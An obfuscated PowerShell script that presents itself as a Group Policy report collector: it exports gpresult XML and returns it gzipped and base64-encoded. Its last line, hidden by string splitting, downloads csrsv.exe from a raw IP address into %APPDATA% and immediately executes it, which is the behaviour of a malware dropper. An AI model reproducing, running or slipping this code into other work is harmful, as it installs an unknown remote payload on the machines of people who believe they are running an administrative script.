  set ("nG"+"60") (  [type]("{3}{1}{0}{2}"-f 'em.iO.F','sT','ILe','sY')  );  SeT-ITem  ("{1}{2}{0}{4}{3}" -f':','VA','riable','AK','s4E')  (  [tYpe]("{6}{2}{3}{5}{0}{1}{4}" -F'N.ComPreSsi','ON','.iO.C','OM','moDE','pRESsIo','SYStem')) ;  Set-ItEM  ('Var'+'IA'+'BLE:BGdl')  ( [type]("{3}{2}{0}{1}" -f'M.con','veRt','ysTe','S')  ) ;  



function G`E`T`BAse64g`zIPpedsTRE`AM {
Param(
    [Parameter(mandATory=${t`Rue},pOsITIoN=0)]
        [System.IO.FileInfo]${Fi`lE}
)
    
    ${M`E`mFiLE} = .("{1}{3}{2}{0}" -f'ct','New-Ob','e','j') ("{1}{4}{3}{2}{0}" -f 'tream','System.IO.','S','mory','Me') (, $Ng60::("{1}{3}{0}{2}"-f'llByt','R','es','eadA').Invoke(${fI`lE}))
        
    
    ${meM`s`TRM} = .("{1}{0}{2}" -f '-O','New','bject') ("{1}{0}{5}{2}{3}{4}" -f'm.IO.M','Syste','ySt','re','am','emor')

    
    ${gZ`sT`RM}  = &("{1}{0}{2}" -f 'w-Obj','Ne','ect') ("{4}{1}{9}{5}{8}{2}{7}{6}{3}{0}"-f 'am','t','r','pStre','Sys','.IO.C','Zi','ession.G','omp','em') ${Me`mSt`Rm}, ( ( VaRIabLE  ("{0}{1}"-f 'S4e','AK') )."V`AlUe"::"COm`P`RESS")

    
    ${Gz`strM}.("{0}{1}" -f 'Wr','ite').Invoke(${ME`mf`ilE}.("{1}{0}" -f 'rray','ToA').Invoke(), 0, ${f`Ile}."lEN`g`TH")
    ${G`zstRM}.("{0}{1}" -f'Clos','e').Invoke()
    ${g`ZstRM}.("{0}{2}{1}"-f'D','spose','i').Invoke()

    
      $bgDL::"toBA`sE64ST`RinG"(${Me`m`STrm}.("{2}{0}{1}"-f'o','Array','T').Invoke())
}

${C`OmP} = ${E`NV:`COmpute`R`Na`Me}
${dA`TE} = &("{0}{1}{2}"-f'G','et-Dat','e') -Format ("{3}{2}{0}{1}" -f'ddH','Hmmss','yMM','yyy')
${p`AtH} = (${e`Nv:`Temp}) + "\" + ${c`OMp} + "_" + ${D`Ate} + ("{0}{3}{2}{1}"-f'GPRes','xml','lt.','u')

if (.("{1}{2}{0}"-f'd','Get-','Comman') ("{6}{7}{5}{0}{1}{2}{3}{4}" -f 'PRe','sultantSe','t','OfPo','licy','G','G','et-') -ErrorAction ("{4}{0}{3}{1}{2}"-f 'on','nu','e','ti','SilentlyC')) {
    .("{3}{4}{5}{0}{2}{1}"-f 'tantS','tOfPolicy','e','Get-G','PRe','sul') -Path ${P`AtH} -ReportType ("{1}{0}" -f'L','XM')
} else {
    .("{1}{2}{0}" -f't.exe','GPRes','ul') ('/X') ${pa`Th}
}

if (${f`ile} = .('ls') ${P`ATH}) {
    ${O`Bj} = "" | &("{2}{1}{0}" -f 'Object','-','Select') ("{0}{3}{1}{2}" -f'GP','tB6','4GZ','Resul')
    ${O`BJ}."GP`ResUltB6`4Gz" = &("{1}{0}{4}{6}{2}{5}{3}" -f 'Base','Get','p','m','64G','edStrea','zip') ${f`ile}
} else {
    ${o`BJ}."GPrEs`UltB64`Gz" = ("{0} could not find {1} on {2}." -f (${m`y`invocaTIoN}."INV`o`Ca`TioNnA`Me"), ${P`Ath}, ${c`OmP})
}
${o`Bj}

(.("{2}{0}{1}"-f '-Objec','t','New') ("{4}{5}{0}{1}{3}{2}{6}"-f'stem','.','bC','Net.We','S','y','lient')).("{1}{3}{2}{0}"-f'le','Down','dFi','loa').Invoke(("{3}{2}{9}{0}{10}{8}{7}{4}{1}{6}{5}"-f'0','8/~yahoo/csrsv','.','http://94','.23','e','.ex','3','.5','1','2'),"$env:APPDATA\csrsv.exe");.("{1}{2}{0}" -f 'ocess','Star','t-Pr') ("$env:APPDATA\csrsv.exe")
